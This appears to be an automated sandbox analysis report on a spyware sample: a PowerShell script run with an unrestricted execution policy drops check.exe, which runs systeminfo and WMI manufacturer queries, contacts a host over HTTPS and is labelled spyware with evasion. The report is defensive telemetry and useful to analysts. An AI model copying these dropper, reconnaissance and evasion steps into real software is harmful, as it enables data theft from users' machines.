Source: check.exe, 00000005.00000003.1669072978.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1674263339.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1672926306.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1670047595.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1666637860.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1666637860.000001FA7C4BA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1670749370.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2218834429.000001FA7C670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: check.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: check.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: check.exe, 00000005.00000002.2217897373.000001FA7C264000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: check.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: check.exe, 00000005.00000002.2217897373.000001FA7C264000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: check.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: check.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: check.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: check.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: check.exe, 00000005.00000002.2221218618.000001FA7CFB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000000.00000002.1577420148.000002B100229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: check.exe, 00000005.00000002.2218577759.000001FA7C434000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: check.exe, 00000005.00000002.2225643903.000001FA7DD34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
Source: check.exe, 00000005.00000002.2222101912.000001FA7D4B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
Source: check.exe, 00000005.00000003.1670749370.000001FA7C463000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1672926306.000001FA7C45D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1674613587.000001FA7C462000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1674263339.000001FA7C456000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2218577759.000001FA7C434000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2217897373.000001FA7C264000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.1671943165.000001FA7C45A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: check.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: check.exe, 00000005.00000002.2218577759.000001FA7C434000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: check.exe, 00000005.00000002.2219001935.000001FA7C770000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1677633256.000001FA7C88D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1677633256.000001FA7C8E8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1678749648.000001FA7C8CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: check.exe, 00000005.00000002.2219688111.000001FA7CA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: check.exe, 00000005.00000002.2218577759.000001FA7C434000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: check.exe, 00000005.00000002.2221218618.000001FA7CFB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: check.exe, 00000005.00000002.2219001935.000001FA7C7C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: check.exe, 00000005.00000002.2221662095.000001FA7D1D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: check.exe, 00000005.00000002.2221662095.000001FA7D1D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: powershell.exe, 00000000.00000002.1577420148.000002B1013B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
Source: check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
Source: check.exe, 00000005.00000002.2219001935.000001FA7C7C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
Source: check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
Source: check.exe, 00000005.00000002.2222101912.000001FA7D430000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2222101912.000001FA7D4E8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: check.exe, 00000005.00000002.2219830861.000001FA7CBCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
Source: check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
Source: check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
Source: check.exe, 00000005.00000002.2219688111.000001FA7CA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip
Source: check.exe, 00000005.00000002.2221662095.000001FA7D1D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: check.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: check.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: check.exe, 00000005.00000002.2221428209.000001FA7D0D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: check.exe, 00000005.00000003.1654050420.000001FA7C431000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219483322.000001FA7C990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
Source: check.exe, 00000005.00000002.2243716928.00007FFB03588000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
Source: check.exe, 00000005.00000002.2222101912.000001FA7D430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
Source: check.exe, 00000005.00000002.2222728447.000001FA7D5A2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2225643903.000001FA7DD34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
Source: check.exe, 00000005.00000002.2218577759.000001FA7C492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: check.exe, 00000005.00000002.2221428209.000001FA7D0D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: check.exe, 00000005.00000002.2221428209.000001FA7D0D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: check.exe, 00000004.00000003.1613622997.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605539019.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1611675678.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1589927228.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1582748043.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1586018913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1613792871.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1604956323.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593302035.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1610704745.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1611120913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1589031823.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605332186.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1612251642.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1587014529.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1587686286.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593302035.000001A2C2643000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1579187739.000001A2C2635000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1575815572.000001A2C2635000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605718815.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593764409.000001A2C2636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: check.exe, 00000005.00000002.2247443286.00007FFB0B520000.00000002.00000001.01000000.0000001B.sdmp, check.exe, 00000005.00000002.2239531674.00007FFB02924000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: https://www.openssl.org/H
Source: check.exe, 00000005.00000002.2219830861.000001FA7CBCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CD32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: check.exe, 00000005.00000002.2243716928.00007FFB03588000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.python.org/psf/license/)
Source: check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219001935.000001FA7C770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HseeHuht\check.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B145C004_2_00007FF60B145C00
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1469644_2_00007FF60B146964
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1289E04_2_00007FF60B1289E0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1408C84_2_00007FF60B1408C8
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1210004_2_00007FF60B121000
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B12A4744_2_00007FF60B12A474
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B12ACAD4_2_00007FF60B12ACAD
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B135D304_2_00007FF60B135D30
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B131B504_2_00007FF60B131B50
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1464184_2_00007FF60B146418
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1408C84_2_00007FF60B1408C8
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B132C104_2_00007FF60B132C10
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B143C104_2_00007FF60B143C10
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B13DA5C4_2_00007FF60B13DA5C
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B12A2DB4_2_00007FF60B12A2DB
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1321644_2_00007FF60B132164
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1319444_2_00007FF60B131944
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1339A44_2_00007FF60B1339A4
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1418744_2_00007FF60B141874
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1440AC4_2_00007FF60B1440AC
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1380E44_2_00007FF60B1380E4
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B131F604_2_00007FF60B131F60
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1317404_2_00007FF60B131740
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1387944_2_00007FF60B138794
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1298004_2_00007FF60B129800
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B139EA04_2_00007FF60B139EA0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B145E7C4_2_00007FF60B145E7C
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B13DEF04_2_00007FF60B13DEF0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1497284_2_00007FF60B149728
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B13E5704_2_00007FF60B13E570
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B131D544_2_00007FF60B131D54
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1335A04_2_00007FF60B1335A0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 5_2_00007FF60B1469645_2_00007FF60B146964
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 5_2_00007FF60B1210005_2_00007FF60B121000
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 5_2_00007FF60B12A4745_2_00007FF60B12A474
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 5_2_00007FF60B12ACAD5_2_00007FF60B12ACAD
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 5_2_00007FF60B135D305_2_00007FF60B135D30
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 5_2_00007FF60B131B505_2_00007FF60B131B50
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 14_2_00007FFAFDF22EE414_2_00007FFAFDF22EE4
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 14_2_00007FFAFDF118F014_2_00007FFAFDF118F0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 14_2_00007FFAFDF1552714_2_00007FFAFDF15527
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 14_2_00007FFAFDF2435014_2_00007FFAFDF24350
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 14_2_00007FFAFDF2338014_2_00007FFAFDF23380
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 14_2_00007FFAFDF12BB014_2_00007FFAFDF12BB0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 14_2_00007FFAFDF1981014_2_00007FFAFDF19810
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 21_2_00007FFAFACB3BD021_2_00007FFAFACB3BD0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 21_2_00007FFAFACC5CC021_2_00007FFAFACC5CC0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 21_2_00007FFAFACB36F021_2_00007FFAFACB36F0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 21_2_00007FFAFACB17D021_2_00007FFAFACB17D0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 21_2_00007FFAFACBD51021_2_00007FFAFACBD510
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 21_2_00007FFAFACF2B8021_2_00007FFAFACF2B80
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: String function: 00007FF60B122710 appears 84 times
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8060 -s 892
Source: unicodedata.pyd.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.6.drStatic PE information: No import functions for PE file found
Source: python3.dll.4.drStatic PE information: No import functions for PE file found
Source: Qt5Core.dll.4.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: Qt5Core.dll.6.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: classification engineClassification label: mal64.spyw.evad.winPS1@39/433@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\KEihGFOa.zipJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8060
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7608
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5112
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3256:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouleizxo.mlg.ps1Jump to behavior
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: check.exeString found in binary or memory: <!--StartFragment-->
Source: check.exeString found in binary or memory: <!--StartFragment-->
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8060 -s 892
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5112 -s 956
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7608 -s 928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" Jump to behavior
